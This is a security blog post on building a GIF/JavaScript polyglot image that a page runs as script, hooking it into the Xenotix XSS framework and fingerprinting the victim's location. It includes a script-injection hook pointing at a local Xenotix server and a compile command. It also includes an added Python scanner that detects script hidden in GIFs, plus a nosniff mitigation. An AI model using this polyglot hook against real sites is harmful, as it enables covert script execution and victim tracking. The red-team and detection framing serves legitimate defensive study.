Let's see how we can build a GIF file that can serve JS.
Download the YASM compiler from http://yasm.tortall.net/Download.html
and this asm file: https://gist.github.com/ajinabraham/f2a057fb1930f94886a3
Your PoC JS code can be just "alert(0)", or for Red Team pentesting I would suggest using OWASP Xenotix XSS Exploit Framework (as I wrote it) or BeEF (an alternative). In this post I will be using Xenotix.
Download Latest Xenotix from https://drive.google.com/file/d/0B_Ci-1YbMqshNHc3RFRPTzcyM00/view?usp=sharing
First of all, run Xenotix and start the server from Settings -> Configure Server.
s = document.createElement("script");
s.src = "http://127.0.0.1:5058/xook.js"; // Xenotix xook URL
document.body.appendChild(s);
In our case we need to dynamically add the Xenotix xook to the page that loads the GIF file as JS, so that we can perform other advanced attacks from that xooked (hooked) page. Here is the gifjs.asm after adding the JS code.
Now let's compile the file.
yasm gifjs.asm -o img.gif
Let's test our valid bi-format GIF file.
Let's create an HTML file with the following source.
<img src="img.gif">
<script src="img.gif"></script>
Open the HTML file in a browser and you will see an image in the browser. Press F12 and go to your console.
Now you can see a message in the console (for Chrome):
Resource interpreted as Script but transferred with MIME type image/gif: "file:///C:/Users/Ajin/Desktop/jspics/img.gif".
This just gives us a hint that the page requested a GIF and interpreted it as JS. This is useful for malware analysts to identify malware embedded in images: malware uses this technique to deliver exploit code and bypass detection. Well, back to our scenario. Now the page is xooked and you can use Xenotix to fire up some XSS exploits.
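The console message is the analyst's side of this trick: a file that is a structurally valid image can still be fetched and run as a script. The Python below is an added example, not code from this post, from the linked gist or from Xenotix. It does not build a polyglot; it walks a GIF's block structure the way an analyst would and reports the places where script text can sit unseen: a comment extension, bytes after the trailer, a logical screen descriptor whose raw bytes read as a JS comment opener, and script-like tokens anywhere in the file. The names scan_gif, is_suspicious and build_sample, the token list and the sample file are my own constructions; the sample is a 1x1 GIF with a comment block and trailing bytes, and is not a working polyglot.

```python
"""Inspect a GIF for places where script text can hide.

Added example, not code from the original post, the gist or Xenotix. It does
not build a GIF/JS polyglot; it walks an existing file's block structure and
reports what a plain image should not contain. Function names, the token
list and the sample bytes are constructed for this demo.
"""
import re
import struct

# Heuristic token list (constructed): strings that have no place in an image.
SCRIPT_TOKENS = [b"document.", b"createElement", b"appendChild", b"<script",
                 b"eval(", b"function(", b"*/"]


def _read_subblocks(data, pos):
    """Consume a chain of GIF data sub-blocks; return (next_pos, payload)."""
    chunks = []
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain at offset %d" % pos)
        n = data[pos]
        pos += 1
        if n == 0:                      # zero-length block terminates the chain
            return pos, b"".join(chunks)
        chunks.append(data[pos:pos + n])
        pos += n


def scan_gif(data):
    """Walk the GIF and collect findings a reviewer can act on."""
    f = {"valid_header": False, "blocks": [], "comments": [],
         "trailing_bytes": 0, "script_tokens": [], "js_comment_in_header": False}
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        return f
    f["valid_header"] = True
    # Logical Screen Descriptor: width, height, packed flags, bg index, aspect.
    width, height, packed = struct.unpack_from("<HHB", data, 6)
    f["screen"] = (width, height)
    # Width/height are raw bytes; a polyglot can pick values that read as "/*".
    f["js_comment_in_header"] = b"/*" in data[6:13]
    pos = 13
    if packed & 0x80:                   # global colour table: 2^(N+1) RGB triples
        pos += 3 * (2 << (packed & 0x07))
    while pos < len(data):
        tag = data[pos]
        if tag == 0x3B:                 # trailer: anything after it is foreign
            f["blocks"].append("trailer")
            f["trailing_bytes"] = len(data) - pos - 1
            break
        if tag == 0x21:                 # extension: label byte + sub-blocks
            label = data[pos + 1]
            pos, payload = _read_subblocks(data, pos + 2)
            f["blocks"].append("ext:0x%02X" % label)
            if label == 0xFE:           # comment extension holds free text
                f["comments"].append(payload.decode("latin-1"))
        elif tag == 0x2C:               # image descriptor (10 bytes incl. tag)
            lpacked = data[pos + 9]
            pos += 10
            if lpacked & 0x80:          # local colour table
                pos += 3 * (2 << (lpacked & 0x07))
            pos += 1                    # LZW minimum code size
            pos, _ = _read_subblocks(data, pos)
            f["blocks"].append("image")
        else:
            f["blocks"].append("unknown:0x%02X" % tag)
            break
    for tok in SCRIPT_TOKENS:
        for m in re.finditer(re.escape(tok), data):
            f["script_tokens"].append((tok.decode(), m.start()))
    return f


def is_suspicious(f):
    """Decision rule: a valid GIF that also carries script-like content."""
    return f["valid_header"] and (f["js_comment_in_header"] or
                                  f["trailing_bytes"] > 0 or
                                  bool(f["script_tokens"]))


def build_sample():
    """Constructed 1x1 GIF with a comment block holding script text and bytes
    after the trailer. It is NOT a working polyglot: the header bytes are not
    valid JavaScript, so a <script src> of this file would only raise an error."""
    header = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
    gct = b"\x00\x00\x00\xff\xff\xff"               # two-entry colour table
    text = b"s=document.createElement('script')"
    comment = b"\x21\xFE" + bytes([len(text)]) + text + b"\x00"
    image = b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    image += b"\x02" + b"\x02\x44\x01" + b"\x00"     # minimal LZW stream
    return header + gct + comment + image + b"\x3B" + b"// bytes after trailer"


if __name__ == "__main__":
    findings = scan_gif(build_sample())
    for k, v in findings.items():
        print("%-22s %r" % (k, v))
    print("suspicious:", is_suspicious(findings))
```

Run it directly to see the findings for the constructed sample; point scan_gif at any file's bytes to triage a real image. The structural walk matters more than the token list, since tokens can be obfuscated but a GIF decoder still has to pass over every byte the author hid. On the serving side, the Chrome message above is only a warning: a response carrying X-Content-Type-Options: nosniff makes Chrome and Firefox refuse to execute a script whose MIME type is image/gif, so the page in this post would still show the picture but the script tag would do nothing.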
Let's use the IP2Geolocation module. Go back to Xenotix and run the IP2Geolocation module from Information Gathering -> Victim Fingerprinting -> IP2Geolocation. Click on Fingerprint and you will get something like this.
Ajin Abraham is a Security Engineer with 7+ years of experience in Application Security including 5 years of Security Research. He is passionate about developing new and unique security tools. Some of his contributions to Hacker's arsenal include Mobile Security Framework (MobSF), nodejsscan, OWASP Xenotix, etc. Areas of interest include runtime security instrumentation, offensive security, web and mobile application security, code and architectural reviews, cloud-native runtime security, security tool development, security automation, breaking and fixing security products, reverse engineering, and exploit development.